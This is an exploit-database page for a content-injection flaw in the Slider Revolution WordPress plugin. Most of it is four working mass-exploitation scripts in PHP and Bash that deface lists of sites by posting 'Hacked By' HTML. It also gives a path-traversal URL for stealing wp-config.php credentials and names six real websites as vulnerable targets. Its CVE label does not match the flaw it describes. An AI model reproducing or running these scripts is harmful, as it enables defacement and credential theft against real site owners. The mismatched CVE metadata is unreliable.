Advertisement






WordPress 5.1.1 Slider Revolution 4.6.5 UpdateCaptionsCSS Remote Content Injection

CVE Category Price Severity
CVE-2019-1663 CWE-74 Not specified High
Author Risk Exploitation Type Date
exploitalert High Remote 2019-03-21
CPE
cpe:cpe:/a:wordpress:wordpress:5.1.1
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H 0.4443 0.66205

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019030176

Below is a copy:

WordPress 5.1.1 Slider Revolution 4.6.5 UpdateCaptionsCSS Remote Content Injection
############################################################################################

# Exploit Title : WordPress 5.1.1 Slider Revolution 4.6.5 UpdateCaptionsCSS Remote Content Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Published Date : 20/03/2019 
# Vulnerability Discovered Date : 2013 - 2014
# Vendor Homepage : revolution.themepunch.com - codecanyon.net
# Software Information Link : codecanyon.net/item/slider-revolution-responsive-wordpress-plugin/2751380
# Software Affected Versions : 4.x.x - 5.x.x with Software 4.6.5 and lower versions
# Software Price Type : Paid Download - 26$
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : 
CWE-74: Improper Neutralization of Special Elements in 
Output Used by a Downstream Component ('Injection')
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# Cyberizm Reference Link : cyberizm.org/cyberizm-wordpress-revslider-get-caption-css-exploit.html

############################################################################################

# Description about Software :
***************************
Slider Revolution (Revolution Slider) is an innovative, responsive WordPress Slider Plugin that displays your content the 

beautiful way. Whether its a Slider, Carousel, Hero Image or Video Scene for best conversion rates or even a whole Front Page, 

the visual, drag & drop editor will let you tell your own stories in no time! Desktop or mobile device!

Note : This Exploit was used in 2014 - 2015 exploited in the wild but it was not shared so in details. That's why I made it public.

############################################################################################

# Impact :
***********
The software constructs all or part of a command, data structure, or record using externally-influenced input from an 

upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify how it is

parsed or interpreted when it is sent to a downstream component and this is called as content injection.

############################################################################################

# Explanation for Vulnerability :
********************************
# Vulnerability : 
************
/wp-content/plugins/revslider/revslider_admin.php

/wp-admin/admin-ajax.php

"action" => "revslider_ajax_action",
"client_action" => "update_captions_css",

# Vulnerability Message :
*************************
{"success":false,"message":"Wrong request"}

# Vulnerability Error for Successfull Exploitation :
*****************************************
{"success":true,"message":"","data":"

# Directory File Destination :
************************
/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css

# Vulnerable Source Code :
************************
232. $action = self::getPostGetVar("client_action");
233. $data = self::getPostGetVar("data");
...
301. case "get_captions_css":
302. $contentCSS = $operations->getCaptionsContent();
303. self::ajaxResponseData($contentCSS);
...
305. case "update_captions_css":
306. $arrCaptions = $operations->updateCaptionsContentData($data);
307. self::ajaxResponseSuccess("CSS file saved
succesfully!",array("arrCaptions"=>$arrCaptions))

# Database Configuration File Download :
************************************
/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

Informations About MySQL Database Configuration File =>
****************************************************
** The name of the database for WordPress */
define('DB_NAME', '');

/** MySQL database username */
define('DB_USER', '');

/** MySQL database password */
define('DB_PASSWORD', '');

/** MySQL hostname */
define('DB_HOST', '');

Note : Use Auto PHP and Bash Exploiter to use this Vulnerability.

############################################################################################

# Content Injection PHP Exploiter 1:
********************************

<b>..::|| Wordpress Revslider UpdateCaptionsCSS GetCaptionsCSS Content Injection Exploiter ||::..</b>
<?php
/*
[#]Coded By : KingSkrupellos
[#]www.cyberizm.org
*/
//======================================================
@error_reporting(0);
@set_time_limit(0);
//======================================================
echo'<form method="post">
<textarea name="s" cols="50" rows="13" ></textarea><br>
<input type="submit" name="g" value="GO" />
</form>';
//=======================================================
if(isset($_POST['g']) and !empty($_POST['s'])){

$urls = explode("\r\n",$_POST['s']);
foreach($urls as $url){
$url = trim($url);
$post = array("action" => "revslider_ajax_action",
  "client_action" => "update_captions_css",
  "data" => "<h2>Hacked By KingSkrupellos Cyberizm Digital Security Army<br>:)<br>");
  
$site = $url."/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css";

$ch = curl_init();
curl_setopt($ch,CURLOPT_URL, $site);
curl_setopt($ch,CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch,CURLOPT_POST,true);
curl_setopt($ch,CURLOPT_POSTFIELDS,$post);
curl_setopt($ch,CURLOPT_TIMEOUT,30);
curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,0);
$cn = curl_exec($ch);

                $fcn = @file_get_contents($site);
if(eregi('hacked',$fcn)){
echo "<b>[#] $url : done <a href=\"$site\">HERE</a></b><br>";
}else{
echo"[!]$url : failed<br>";
}
}
}
//========================= \!/ Mission Accomplished \!/ ====================================================//
?>

############################################################################################

# Content Injection PHP Exploiter 2 :
*********************************

<?php
        echo "\n+-------------------------------------------+\n";
        echo "|  Cyberizm Digital Security Army             |\n";
        echo "|     www.cyberizm.org |\n";
        echo "+-------------------------------------------+\n";

$gv=@file_get_contents($argv[1]);
    $exv=explode("\r\n",$gv);
    echo "\n\t Total site loaded : ".count($exv)."\n\n";
    foreach($exv as $url){
      echo "\n[+]Scaning : $url \n";
      dr($url);
    }
  function dr($site){
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, "".$site."/wp-admin/admin-ajax.php");
    curl_setopt($ch, CURLOPT_USERAGENT, $agent);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, array("action" => "revslider_ajax_action", "client_action" => "update_captions_css", "data" => "<body style='color: transparent;background-color: black'><center><h1><b style='color: white'>Hacked by KingSkrupellos Cyberizm Digital Security Team<p style='color: transparent'>"));
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie_file_path);
    curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie_file_path);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
    $result = curl_exec($ch);
            if (eregi('true', $result)) 
            
                $path="$site/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css";
$gett=@file_get_contents($path);
if(preg_match('/Hacked by KingSkrupellos Cyberizm Digital Security Army/',$gett)){
  echo "\n[+]Exploit Done \n[+]shell : $path \n\n ";
                $fo = fopen("finish.txt","a+");
            $r = fwrite($fo,"".$path."/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css\r\n");
            fclose($fo);
    } else {
        echo "| ".$site . " : Not Revslider \n\n";
    }
    curl_close($ch);
    
    }
    
       echo "\n[-]Exploit Fail \n\n";
}


    
        }
?>

############################################################################################

# Content Injection Bash Exploiter 3 :
*********************************
#!/bin/bash
#coded = IBT
SS(){
curl --silent --max-time 10 --connect-timeout 10 -o tmp/resp.txt \
-H "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de-LI; rv:1.9.0.16) Gecko/2009120208 Firefox/3.0.16 (.NET CLR 3.5.30729)" \
-H "Accept-Language: en-us,en;q=0.5" \
-H "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7" \
-F "client_action=update_captions_css" \
-F "action=revslider_ajax_action" \
-F "data=x$(cat tmp/s.txt)" \
--request POST "http://${1}/wp-admin/admin-ajax.php"
}
CD(){
if [ -f tmp/cd.txt ];then
rm -f tmp/cd.txt
fi
curl --silent --max-time 10 --connect-timeout 10 "http://${1}/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css" -o tmp/cd.txt
if [ ! -f tmp/cd.txt ];then
echo "--> $urlnya : not vuln"
continue
fi
cat tmp/cd.txt | grep -i "KingSkrupellos" > /dev/null;cd=$?
if [ $cd -eq 0 ];then
echo "--> ${1}/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css : exploit success"
echo "http://${1}/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css" >> success.txt
else
echo "--> $urlnya : exploit failed"
fi
}
CV(){
if [ -f tmp/cv.txt ];then
rm -f tmp/cv.txt
fi
curl --silent --max-time 10 --connect-timeout 10 "http://${1}/wp-admin/admin-ajax.php?action=revslider_ajax_action" -o tmp/cv.txt
if [ ! -f tmp/cv.txt ];then
echo "--> $urlnya : not vuln"
continue
fi
cat tmp/cv.txt | grep "wrong ajax action:" > /dev/null;cv=$?
if [ $cv -eq 1 ];then
echo "--> $urlnya : not vuln"
continue
else
echo "--> $urlnya : found revslider"
fi
}
Exp(){
for url in `cat $list`
do
urlnya=$(echo $url | awk '{gsub("http://","")}1' | awk '{gsub("https://","")}1' | awk '{gsub("//","/")}1' | awk '{gsub("//","/")}1')
if [ ! -f load.txt ];then
touch load.txt
fi
cat load.txt | grep "$urlnya" > /dev/null;ccl=$?
if [ $ccl -eq 1 ];then
echo $urlnya >> load.txt
else
#udah pernah di load di file load.txt
#kalau mau load ulang,silakan hapus file load.txt
continue
fi
echo "--> $urlnya : check"
CV $urlnya
SS $urlnya
CD $urlnya
done
}
Lengkap(){
if [ ! -f $list ];then
echo "[!] $list not exist"
exit
fi
if [ ! -d tmp ];then
mkdir tmp
fi
if [ ! -f tmp/s.txt ];then
cat > tmp/s.txt <<_script
<body style='color: transparent;background-color: black'><center><h1><b style='color: white'>Hacked by KingSkrupellos Cyberizm Digital Security Army<p style='color: transparent'>
_script
fi
Exp
}
read -p "[+] Enter list target = " list
Lengkap

############################################################################################

# Content Injection PHP Exploiter 4 :
*********************************
<?php

$post = array
(
"action" => "revslider_ajax_action",
"client_action" => "update_captions_css",
"data" => "<marquee>Hacked By KingSkrupellos Cyberizm Digital Security Army</marquee>"
);

$ch = curl_init ("http://localhost/wp-admin/admin-ajax.php");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);

?>

############################################################################################

# Example Vulnerable Sites :
*************************
[+] filature-lille.com/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css

[+] daniperezrun.com/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css

[+] bilateralsolutions.com/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css

[+] blog.acquaesapone.it/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css

[+] new.med.com.do/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css

[+] en.neural.co.jp/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css

############################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

############################################################################################

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.